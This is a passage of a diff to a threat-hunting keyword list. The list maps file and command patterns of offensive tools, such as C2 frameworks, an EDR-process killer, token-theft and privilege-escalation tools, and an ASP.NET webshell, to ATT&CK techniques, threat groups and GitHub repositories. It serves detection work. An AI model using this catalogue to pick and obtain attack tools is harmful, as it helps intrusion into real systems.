HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SharpTerminator.exe*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.git*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.sln*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" @@ -16754,27 +16937,27 @@ "*SharpToken* list_token*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken* tscon *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken.csproj*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*SharpToken.exe*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken.git*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpToken-main.zip*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" "*SharpUnhooker.*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUnhooker-main*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" -"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1021","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" -"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1022","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" +"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpUpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpUpMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpView.exe*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*SharpView\SharpView*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*SharpView-master*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" -"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpWebManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpWMI.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWmiManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpwmi-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" @@ -16785,11 +16968,11 @@ "*sharpyshell.aspx*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*SharPyShell.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*SharpZeroLogon*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 